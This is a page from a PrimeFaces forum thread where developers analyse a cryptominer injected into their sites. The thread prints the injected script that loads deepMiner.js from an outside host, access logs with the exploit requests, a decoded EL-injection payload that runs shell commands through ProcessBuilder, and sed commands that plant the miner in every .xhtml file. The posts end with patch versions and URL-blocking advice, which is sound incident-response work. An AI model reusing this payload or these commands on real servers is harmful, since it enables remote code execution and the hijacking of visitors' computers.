Page 4 of 6

Re: URGENT: Mining-script in Primfaces-Page? Where does it come from??

Posted: 18 Jan 2018, 20:20
by danielkohl
Hi all,

I switched to 6.1 yesterday and now i see this in my console (Chrome 62) :

Code: Select all

GET https://jhondi33.duckdns.org:7777/deepMiner.min.js net::ERR_TUNNEL_CONNECTION_FAILED
Location: ripple-effect.js.xhtml?ln=modena-layout:54

Code: Select all

if(document){
	document.addEventListener('DOMContentLoaded', function () {
		var my_awesome_script = document.createElement('script');
		my_awesome_script.setAttribute('src','https://jhondi33.duckdns.org:7777/deepMiner.min.js');
		document.body.appendChild(my_awesome_script);
	});
}
Retrieving the script fortunately failed, but nevertheless this script is injected and part of the source.


Greetings

Daniel

Re: URGENT: Mining-script in Primfaces-Page? Where does it come from??

Posted: 18 Jan 2018, 21:09
by Melloware
@danielkohl and youi have verified in your view source of your HTML page that 6.1 is actually in effect?

Code: Select all

src="/javax.faces.resource/core.js.xhtml?ln=primefaces&v=6.1"

Re: URGENT: Mining-script in Primfaces-Page? Where does it come from??

Posted: 18 Jan 2018, 21:19
by tandraschko
You can check the source file of ripple-effect.js if the code is really part of the file?

Lets say that the problem really is a EL injection problem (also it should not occur since 6.0):
I wonder if it's possible to manipulate resource files via EL injection...
And i also wonder how it's done... If it happens after some hours, it could be that a bot periodically calls a resource url with EL injection.
This means that you should add debug logging (request url, client,...) and check the exact time.

Also, it may be another bug - maybe in the JSF impl. MyFaces had a similar EL injection years ago (https://issues.apache.org/jira/browse/MYFACES-3405). Maybe there is still something in Mojarra.

Re: URGENT: Mining-script in Primfaces-Page? Where does it come from??

Posted: 19 Jan 2018, 00:22
by chimmelb
@Melloware - Great suggestion about looking for the 6.1 tags in the requested scripts, and @tandraschko for the idea to look at logs.

In an effort to help patch this bug (not to give ideas to other hackers), these are our NGINX access logs around the time of the injection. I don't understand all the stuff that looks like Base64 to me, but one can clearly see the script being added and commands being run. That is a nasty vulnerability, and looks exactly like the blog post about the EL injection from Github Issue #1152.

Code: Select all

172.31.13.178 - - [15/Jan/2018:10:58:54 -0500] "GET /javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&ln=primefaces&pfdrid=4ib88tY5cy3INAZZsdtHPFU0Qzf8xqfq7ScCVr132r36qawXCNDixKdRFB
0XZvCTU9npUitDjk1QTkIeQJA4yEY72QT3qDGJpZjuqCDIWniQcr2vJZR%2B005iFZzJ%2Fi7VR9Mx5l5cedTgq9wS03rem26ubch9%2Bq4W6msPwJ1hk0KMefG9yZl3o5nYeA5gvnp9LQJb3r%2BM1yQ00zFBDzT4i9Nsx%2Fs5eaGsq9BFptosdH06iT1k7r
n%2BrQtPjyIbOQzOmnMx%2F6THLsOCppRaIG7BW4VRbsIi1gJ8cRh6%2Bad71ukPWbDdM6S6O0Qcr%2FdkssHfL5%2F7y8Xy%2FcyDiiljeZj3dIibq3CSy6RBaZGzRXqjYAyV%2FJ7n3ulIkSVKszrCy3VyWb1uCY0fKLrPd3EO%2Flsw3k%2FbYSofV9MA%2
BAaTnD8PXYhmiYGvp9b2R1BQGb8WgFk0fyTITJFZfUTJhM%2BiRJruw9ALDox8MY9S0SnpbmXM3LQmVYSghH0j4Zgi7Te7SZZK6gqgZEkrTA%2BQgAaZRIFG6R810xr5PZoWWG0Fdf9x491vRYtUSet8xCHIofPZ7fS5uP3mi2btGxWy8TgAEyC2wT%2F19mud
ycgOdTXW9nMt5nOf62fOdKSBYs2jStSwe2a6I6N5Bzp0Z7sdiJ0gmrHiYoJlkyT7p0wWGEk5Q4Xe1EPWIwGZIOr43j6BE7HUP5%2F7KdejsAQzNZZr1ox99VhH1TYwRuH7A7%2BN%2FWheWQCn%2FEM0xlpXC4GssZp4xPVah%2BP9wNH054upTkx4jH8j4hou
h2UfrjM9Vn18J%2BC1inTqHliDnzu9LFrm5L88eHCnLNDf6cyNmIaom7o2hEoNcffVMJ%2FhWkW7XwVkNS2b0%2B%2B1ZgQXCd7QE0dpIujuJ79keSD1cUyGdgKCVx70vtcbAcfa07Yt3DBPzeIP%2FLQjU6%2F%2BEwTS3oy4gttmMReFb7Bmn0uOUsmGZ%2F
KkJNyWwN3wlsEfNFJzLx8%2FtCWjroQVWR0xS0ZudruYXAFmmi9O5iPYjyyQCH8JUrzR4N9vyWffKq1THVtN21EvX7x87Xl908kTe79uh6J61ICVo0PABqIl87m1n7te3d3pZ72PCXetr7GcaElzna95Nfoix9pwJ6GWAjRTcGNPT67lMx7cYKXmTD0mQAzXvl
gWi2yEzFt9NA0NFhhZ4m6UeRZ7%2Bgs1Rr0HMpPu%2FNIvaCjTyZRdqRyxrDQ%2FF2QCTxpVEWKYWEEV2t6g%2BQ2m3Xo%2ByyWgeDbY8mHmwkdYUKO3QtwYxXtXTKT9dwCRtE1wDsYjLN0wMdSrg4YX3jCYlt7kV%2FymlnhNoSnVQoDJeumsGI1%2BdmKu2A
JY8sGqXo2PJd10CxpQSO6D4F7RxA8fQji8shFybjhRek0YiEXxmvnhsBzCkBCXWguA7RXsMGLrerXVD1wHo5Jf7wQmLOyKUH7nne9ezwzVdQnaqadFehgZ6a6f5d%2FfxIRUZ1tKeLPST16CBlY0%2BPsRQDJJwWrRXdpuwon4PzHQXLD%2BAhQ%2F8j9Mb0OT
M8RdZLuRjXw7tcY4muQDwMRCb92ipMiorDO8jVwPPOAXc5waNbSGmRhzOW1%2BLsQpV8OEMKVMDXq5dRoYKz6tlH0Zh4eZTHED3hK8z4cukSTXuxFpdC5NjiVsyhQU71J87Tvkzw1HxbjqhJK%2BkoPySJCmpHOmrrsbNlp0kHtNHuhY&cmd=cd+.%3Bpwd HT
TP/1.1" 200 60 "-" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" "77.247.181.162"

172.31.13.178 - - [15/Jan/2018:10:58:57 -0500] "GET /javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&ln=primefaces&pfdrid=4ib88tY5cy3INAZZsdtHPFU0Qzf8xqfq7ScCVr132r36qawXCNDixKdRFB
0XZvCTU9npUitDjk1QTkIeQJA4yEY72QT3qDGJpZjuqCDIWniQcr2vJZR%2B005iFZzJ%2Fi7VR9Mx5l5cedTgq9wS03rem26ubch9%2Bq4W6msPwJ1hk0KMefG9yZl3o5nYeA5gvnp9LQJb3r%2BM1yQ00zFBDzT4i9Nsx%2Fs5eaGsq9BFptosdH06iT1k7r
n%2BrQtPjyIbOQzOmnMx%2F6THLsOCppRaIG7BW4VRbsIi1gJ8cRh6%2Bad71ukPWbDdM6S6O0Qcr%2FdkssHfL5%2F7y8Xy%2FcyDiiljeZj3dIibq3CSy6RBaZGzRXqjYAyV%2FJ7n3ulIkSVKszrCy3VyWb1uCY0fKLrPd3EO%2Flsw3k%2FbYSofV9MA%2
BAaTnD8PXYhmiYGvp9b2R1BQGb8WgFk0fyTITJFZfUTJhM%2BiRJruw9ALDox8MY9S0SnpbmXM3LQmVYSghH0j4Zgi7Te7SZZK6gqgZEkrTA%2BQgAaZRIFG6R810xr5PZoWWG0Fdf9x491vRYtUSet8xCHIofPZ7fS5uP3mi2btGxWy8TgAEyC2wT%2F19mud
ycgOdTXW9nMt5nOf62fOdKSBYs2jStSwe2a6I6N5Bzp0Z7sdiJ0gmrHiYoJlkyT7p0wWGEk5Q4Xe1EPWIwGZIOr43j6BE7HUP5%2F7KdejsAQzNZZr1ox99VhH1TYwRuH7A7%2BN%2FWheWQCn%2FEM0xlpXC4GssZp4xPVah%2BP9wNH054upTkx4jH8j4hou
h2UfrjM9Vn18J%2BC1inTqHliDnzu9LFrm5L88eHCnLNDf6cyNmIaom7o2hEoNcffVMJ%2FhWkW7XwVkNS2b0%2B%2B1ZgQXCd7QE0dpIujuJ79keSD1cUyGdgKCVx70vtcbAcfa07Yt3DBPzeIP%2FLQjU6%2F%2BEwTS3oy4gttmMReFb7Bmn0uOUsmGZ%2F
KkJNyWwN3wlsEfNFJzLx8%2FtCWjroQVWR0xS0ZudruYXAFmmi9O5iPYjyyQCH8JUrzR4N9vyWffKq1THVtN21EvX7x87Xl908kTe79uh6J61ICVo0PABqIl87m1n7te3d3pZ72PCXetr7GcaElzna95Nfoix9pwJ6GWAjRTcGNPT67lMx7cYKXmTD0mQAzXvl
gWi2yEzFt9NA0NFhhZ4m6UeRZ7%2Bgs1Rr0HMpPu%2FNIvaCjTyZRdqRyxrDQ%2FF2QCTxpVEWKYWEEV2t6g%2BQ2m3Xo%2ByyWgeDbY8mHmwkdYUKO3QtwYxXtXTKT9dwCRtE1wDsYjLN0wMdSrg4YX3jCYlt7kV%2FymlnhNoSnVQoDJeumsGI1%2BdmKu2A
JY8sGqXo2PJd10CxpQSO6D4F7RxA8fQji8shFybjhRek0YiEXxmvnhsBzCkBCXWguA7RXsMGLrerXVD1wHo5Jf7wQmLOyKUH7nne9ezwzVdQnaqadFehgZ6a6f5d%2FfxIRUZ1tKeLPST16CBlY0%2BPsRQDJJwWrRXdpuwon4PzHQXLD%2BAhQ%2F8j9Mb0OT
M8RdZLuRjXw7tcY4muQDwMRCb92ipMiorDO8jVwPPOAXc5waNbSGmRhzOW1%2BLsQpV8OEMKVMDXq5dRoYKz6tlH0Zh4eZTHED3hK8z4cukSTXuxFpdC5NjiVsyhQU71J87Tvkzw1HxbjqhJK%2BkoPySJCmpHOmrrsbNlp0kHtNHuhY&cmd=cd+..%3Bfind+
.+-type+f+-name+%27*.xhtml%27+%7C+xargs+sed+-i+-e+%27s%7C%3Cscript.*jhondi33.*%3C%5C%2Fscript%3E%7C%7Cg%27+-e+%27s%7C%3Cscript.*var+miner+%3D+new+deepMiner%5C.Anonymous.*%3C%5C%2Fscript%3E%7C%7C
g%27+2%3E%261%3B+find+.+-type+f+-name+%27*.xhtml%27+%7C+xargs+sed+-i+-e+%27s%7C%3Cscript.*smkimmo.*%3C%5C%2Fscript%3E%7C%7Cg%27+-e+%27s%7C%3Cscript.*var+miner+%3D+new+deepMiner%5C.Anonymous.*%3C
%5C%2Fscript%3E%7C%7Cg%27+2%3E%261%3B+find+.+-type+f+-name+%27*.xhtml%27+%7C+xargs+sed+-i+-e+%27s%7C%3Cscript.*cryptoloot.*%3C%5C%2Fscript%3E%7C%7Cg%27+-e+%27s%7C%3Cscript.*var+miner+%3D+new+CRL
T%5C.Anonymous.*%3C%5C%2Fscript%3E%7C%7Cg%27+2%3E%261%3B+find+.+-type+f+-name+%27*.xhtml%27+%7C+xargs+sed+-i+%27s%7C%3C%2Fui%3Adefine%3E%7C%3Cscr%27%27ipt+src%3D%5C%22https%3A%2F%2Fjhondi33.duck
dns.org%3A7777%2FdeepMiner.js%5C%22%3E%3C%2Fs%27%27cript%3E%3Cscr%27%27ipt%3Evar+miner+%3D+new+deepMiner.Anonymous%28%5C%22605dee2nnpasaa%5C%22%29%3Bminer.start%28%29%3B%3C%2Fscri%27%27pt%3E%3C%
2Fui%3Adefine%3E%7Cg%27+2%3E%261%3B+find+.+-type+f+-name+%27*.xhtml%27+%7C+xargs+sed+-i+%27s%7C%3C%2Fh%3Abody%3E%7C%3Csc%27%27ript+src%3D%5C%22https%3A%2F%2Fjhondi33.duckdns.org%3A7777%2FdeepMin
er.js%5C%22%3E%3C%2Fscri%27%27pt%3E%3Csc%27%27ript%3Evar+miner+%3D+new+deepMiner.Anonymous%28%5C%22605dee2nnpasaa%5C%22%29%3Bminer.start%28%29%3B%3C%2Fscr%27%27ipt%3E%3C%2Fh%3Abody%3E%7Cg%27+2%3
E%261 HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" "77.247.181.162"

172.31.13.178 - - [15/Jan/2018:10:59:02 -0500] "GET /javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&ln=primefaces&pfdrid=4ib88tY5cy3INAZZsdtHPFU0Qzf8xqfq7ScCVr132r36qawXCNDixKdRFB0XZvCTU9npUitDjk1QTkIeQJA4yEY72QT3qDGJpZjuqCDIWniQcr2vJZR%2B005iFZzJ%2Fi7VR9Mx5l5cedTgq9wS03rem26ubch9%2Bq4W6msPwJ1hk0KMefG9yZl3o5nYeA5gvnp9LQJb3r%2BM1yQ00zFBDzT4i9Nsx%2Fs5eaGsq9BFptosdH06iT1k7rn%2BrQtPjyIbOQzOmnMx%2F6THLsOCppRaIG7BW4VRbsIi1gJ8cRh6%2Bad71ukPWbDdM6S6O0Qcr%2FdkssHfL5%2F7y8Xy%2FcyDiiljeZj3dIibq3CSy6RBaZGzRXqjYAyV%2FJ7n3ulIkSVKszrCy3VyWb1uCY0fKLrPd3EO%2Flsw3k%2FbYSofV9MA%2BAaTnD8PXYhmiYGvp9b2R1BQGb8WgFk0fyTITJFZfUTJhM%2BiRJruw9ALDox8MY9S0SnpbmXM3LQmVYSghH0j4Zgi7Te7SZZK6gqgZEkrTA%2BQgAaZRIFG6R810xr5PZoWWG0Fdf9x491vRYtUSet8xCHIofPZ7fS5uP3mi2btGxWy8TgAEyC2wT%2F19mudycgOdTXW9nMt5nOf62fOdKSBYs2jStSwe2a6I6N5Bzp0Z7sdiJ0gmrHiYoJlkyT7p0wWGEk5Q4Xe1EPWIwGZIOr43j6BE7HUP5%2F7KdejsAQzNZZr1ox99VhH1TYwRuH7A7%2BN%2FWheWQCn%2FEM0xlpXC4GssZp4xPVah%2BP9wNH054upTkx4jH8j4houh2UfrjM9Vn18J%2BC1inTqHliDnzu9LFrm5L88eHCnLNDf6cyNmIaom7o2hEoNcffVMJ%2FhWkW7XwVkNS2b0%2B%2B1ZgQXCd7QE0dpIujuJ79keSD1cUyGdgKCVx70vtcbAcfa07Yt3DBPzeIP%2FLQjU6%2F%2BEwTS3oy4gttmMReFb7Bmn0uOUsmGZ%2FKkJNyWwN3wlsEfNFJzLx8%2FtCWjroQVWR0xS0ZudruYXAFmmi9O5iPYjyyQCH8JUrzR4N9vyWffKq1THVtN21EvX7x87Xl908kTe79uh6J61ICVo0PABqIl87m1n7te3d3pZ72PCXetr7GcaElzna95Nfoix9pwJ6GWAjRTcGNPT67lMx7cYKXmTD0mQAzXvlgWi2yEzFt9NA0NFhhZ4m6UeRZ7%2Bgs1Rr0HMpPu%2FNIvaCjTyZRdqRyxrDQ%2FF2QCTxpVEWKYWEEV2t6g%2BQ2m3Xo%2ByyWgeDbY8mHmwkdYUKO3QtwYxXtXTKT9dwCRtE1wDsYjLN0wMdSrg4YX3jCYlt7kV%2FymlnhNoSnVQoDJeumsGI1%2BdmKu2AJY8sGqXo2PJd10CxpQSO6D4F7RxA8fQji8shFybjhRek0YiEXxmvnhsBzCkBCXWguA7RXsMGLrerXVD1wHo5Jf7wQmLOyKUH7nne9ezwzVdQnaqadFehgZ6a6f5d%2FfxIRUZ1tKeLPST16CBlY0%2BPsRQDJJwWrRXdpuwon4PzHQXLD%2BAhQ%2F8j9Mb0OTM8RdZLuRjXw7tcY4muQDwMRCb92ipMiorDO8jVwPPOAXc5waNbSGmRhzOW1%2BLsQpV8OEMKVMDXq5dRoYKz6tlH0Zh4eZTHED3hK8z4cukSTXuxFpdC5NjiVsyhQU71J87Tvkzw1HxbjqhJK%2BkoPySJCmpHOmrrsbNlp0kHtNHuhY&cmd=cd+%2Flib%3Bfind+.+-type+f+-name+%27*.xhtml%27+%7C+xargs+sed+-i+-e+%27s%7C%3Cscript.*jhondi33.*%3C%5C%2Fscript%3E%7C%7Cg%27+-e+%27s%7C%3Cscript.*var+miner+%3D+new+deepMiner%5C.Anonymous.*%3C%5C%2Fscript%3E%7C%7Cg%27+2%3E%261%3B+find+.+-type+f+-name+%27*.xhtml%27+%7C+xargs+sed+-i+-e+%27s%7C%3Cscript.*smkimmo.*%3C%5C%2Fscript%3E%7C%7Cg%27+-e+%27s%7C%3Cscript.*var+miner+%3D+new+deepMiner%5C.Anonymous.*%3C%5C%2Fscript%3E%7C%7Cg%27+2%3E%261%3B+find+.+-type+f+-name+%27*.xhtml%27+%7C+xargs+sed+-i+-e+%27s%7C%3Cscript.*cryptoloot.*%3C%5C%2Fscript%3E%7C%7Cg%27+-e+%27s%7C%3Cscript.*var+miner+%3D+new+CRLT%5C.Anonymous.*%3C%5C%2Fscript%3E%7C%7Cg%27+2%3E%261%3B+find+.+-type+f+-name+%27*.xhtml%27+%7C+xargs+sed+-i+%27s%7C%3C%2Fui%3Adefine%3E%7C%3Cscr%27%27ipt+src%3D%5C%22https%3A%2F%2Fjhondi33.duckdns.org%3A7777%2FdeepMiner.js%5C%22%3E%3C%2Fs%27%27cript%3E%3Cscr%27%27ipt%3Evar+miner+%3D+new+deepMiner.Anonymous%28%5C%22605dee2nnpasaa%5C%22%29%3Bminer.start%28%29%3B%3C%2Fscri%27%27pt%3E%3C%2Fui%3Adefine%3E%7Cg%27+2%3E%261%3B+find+.+-type+f+-name+%27*.xhtml%27+%7C+xargs+sed+-i+%27s%7C%3C%2Fh%3Abody%3E%7C%3Csc%27%27ript+src%3D%5C%22https%3A%2F%2Fjhondi33.duckdns.org%3A7777%2FdeepMiner.js%5C%22%3E%3C%2Fscri%27%27pt%3E%3Csc%27%27ript%3Evar+miner+%3D+new+deepMiner.Anonymous%28%5C%22605dee2nnpasaa%5C%22%29%3Bminer.start%28%29%3B%3C%2Fscr%27%27ipt%3E%3C%2Fh%3Abody%3E%7Cg%27+2%3E%261 HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" "77.247.181.162"

(this one is my own machine requesting around the time of the hack, and noting the 5.3 version there.)
172.31.13.178 - - [15/Jan/2018:10:59:02 -0500] "GET /javax.faces.resource/dynamiccontent.properties.xhtml?ln=primefaces&v=5.3&pfdrid=ZUexOiZiumPh9Fv3ERem%2Fgs6a3geXM9vtvTDgdHv7OQ%3D&pfdrt=sc&pfdrid_c=false&uid=72278d26-1d64-4b80-84f5-2f6cdecbc67b HTTP/1.1" 200 24542 "https://[REDACTED].xhtml" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
Clever attack, but crazy dangerous. Definitely needs patched for any one running an old 5.3, and a very urgent request to @danielkohl to post if this came back when using 6.1. Check those Apache/nginx logs.

Re: URGENT: Mining-script in Primfaces-Page? Where does it come from??

Posted: 19 Jan 2018, 09:44
by danielkohl
Melloware wrote:
18 Jan 2018, 21:09
@danielkohl and youi have verified in your view source of your HTML page that 6.1 is actually in effect?

Code: Select all

src="/javax.faces.resource/core.js.xhtml?ln=primefaces&v=6.1"
Yes, it's 6.1.

Re: URGENT: Mining-script in Primfaces-Page? Where does it come from??

Posted: 19 Jan 2018, 09:49
by cagatay.civici
There was a security issue in PrimeFaces 5.x, please update PrimeFaces to get this patched. The minimum versions required for the patch are;

5.2.21, 5.3.8 or 6.0

Re: URGENT: Mining-script in Primfaces-Page? Where does it come from??

Posted: 19 Jan 2018, 11:48
by tandraschko
Request 1:

Code: Select all

${session.setAttribute("arr","".getClass().forName("java.util.ArrayList").newInstance())}
${session.setAttribute("scriptfactory", session.getClass().getClassLoader().getParent().newInstance(session.getAttribute("arr").toArray(session.getClass().getClassLoader().getParent().getURLs())).loadClass("javax.script.ScriptEngineManager").newInstance())}
${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}
${facesContext.getExternalContext().setResponseHeader("resp1", session.getAttribute("scriptengine"))}
${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}
${session.getAttribute("scriptengine").eval("var proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"".concat(request.getParameter("cmd")).concat("\"]).start(); var is = proc.getInputStream(); var sc = new java.util.Scanner(is,\"UTF-8\"); var out = \"\"; while (sc.hasNext()) {out += sc.nextLine()+String.fromCharCode(10);} print(out);"))}
${facesContext.getExternalContext().getResponse().getWriter().flush()}${facesContext.getExternalContext().getResponse().getWriter().close()}
${facesContext.getExternalContext().setResponseHeader("stillok", "yes")}
CMD 1:

Code: Select all

cd .;pwd
Request2:

Code: Select all

${session.setAttribute("arr","".getClass().forName("java.util.ArrayList").newInstance())}
${session.setAttribute("scriptfactory", session.getClass().getClassLoader().getParent().newInstance(session.getAttribute("arr").toArray(session.getClass().getClassLoader().getParent().getURLs())).loadClass("javax.script.ScriptEngineManager").newInstance())}
${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}
${facesContext.getExternalContext().setResponseHeader("resp1", session.getAttribute("scriptengine"))}
${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}
${session.getAttribute("scriptengine").eval("var proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"".concat(request.getParameter("cmd")).concat("\"]).start(); var is = proc.getInputStream(); var sc = new java.util.Scanner(is,\"UTF-8\"); var out = \"\"; while (sc.hasNext()) {out += sc.nextLine()+String.fromCharCode(10);} print(out);"))}
${facesContext.getExternalContext().getResponse().getWriter().flush()}${facesContext.getExternalContext().getResponse().getWriter().close()}
${facesContext.getExternalContext().setResponseHeader("stillok", "yes")}
CMD 2:

Code: Select all

&cmd=cd ..;find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*jhondi33.*<\/script>||g' -e 's|<script.*var miner = new deepMiner\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*smkimmo.*<\/script>||g' -e 's|<script.*var miner = new deepMiner\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*cryptoloot.*<\/script>||g' -e 's|<script.*var miner = new CRLT\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i 's|</ui:define>|<scr''ipt src=\"https://jhondi33.duckdns.org:7777/deepMiner.js\"></s''cript><scr''ipt>var miner = new deepMiner.Anonymous(\"605dee2nnpasaa\");miner.start();</scri''pt></ui:define>|g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i 's|</h:body>|<sc''ript src=\"https://jhondi33.duckdns.org:7777/deepMiner.js\"></scri''pt><sc''ript>var miner = new deepMiner.Anonymous(\"605dee2nnpasaa\");miner.start();</scr''ipt></h:body>|g' 2>&1
Request3:

Code: Select all

${session.setAttribute("arr","".getClass().forName("java.util.ArrayList").newInstance())}
${session.setAttribute("scriptfactory", session.getClass().getClassLoader().getParent().newInstance(session.getAttribute("arr").toArray(session.getClass().getClassLoader().getParent().getURLs())).loadClass("javax.script.ScriptEngineManager").newInstance())}
${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}
${facesContext.getExternalContext().setResponseHeader("resp1", session.getAttribute("scriptengine"))}
${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}
${session.getAttribute("scriptengine").eval("var proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"".concat(request.getParameter("cmd")).concat("\"]).start(); var is = proc.getInputStream(); var sc = new java.util.Scanner(is,\"UTF-8\"); var out = \"\"; while (sc.hasNext()) {out += sc.nextLine()+String.fromCharCode(10);} print(out);"))}
${facesContext.getExternalContext().getResponse().getWriter().flush()}${facesContext.getExternalContext().getResponse().getWriter().close()}
${facesContext.getExternalContext().setResponseHeader("stillok", "yes")}
CMD3:

Code: Select all

cmd=cd /lib;find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*jhondi33.*<\/script>||g' -e 's|<script.*var miner = new deepMiner\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*smkimmo.*<\/script>||g' -e 's|<script.*var miner = new deepMiner\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*cryptoloot.*<\/script>||g' -e 's|<script.*var miner = new CRLT\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i 's|</ui:define>|<scr''ipt src=\"https://jhondi33.duckdns.org:7777/deepMiner.js\"></s''cript><scr''ipt>var miner = new deepMiner.Anonymous(\"605dee2nnpasaa\");miner.start();</scri''pt></ui:define>|g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i 's|</h:body>|<sc''ript src=\"https://jhondi33.duckdns.org:7777/deepMiner.js\"></scri''pt><sc''ript>var miner = new deepMiner.Anonymous(\"605dee2nnpasaa\");miner.start();</scr''ipt></h:body>|g' 2>&1
As you can see, it runs something from the CMD url parameter. Will extract those commands now.
As i said, it's fixed since 6.0 but as something with ProcessBuilder is executed, it seems that a restart of the server with a new PF version doesn't remove those stuff.

Re: URGENT: Mining-script in Primfaces-Page? Where does it come from??

Posted: 19 Jan 2018, 12:01
by tandraschko
AFAICS it could be enough to completely clear (all xhtml files must be removed) the application server + redeploy.
I would the AppServer + redeploy with PF 6.1 - or completely reinstall!

Re: URGENT: Mining-script in Primfaces-Page? Where does it come from??

Posted: 22 Jan 2018, 17:07
by froethen
Primefaces version 4.0.9 is also vulnerable to this attack.

Re: URGENT: Mining-script in Primfaces-Page? Where does it come from??

Posted: 22 Jan 2018, 21:06
by Melloware
Hey guys,

I know I can block in 5.X the URL: /javax.faces.resource/dynamiccontent.properties.xhtml

Does anyone know what that URL is for 4.X for the old PrimeResourceHandler? I have a client with an old version using 4.x that they can't afford to upgrade but need to block that pre-emptively.

Thanks in advance!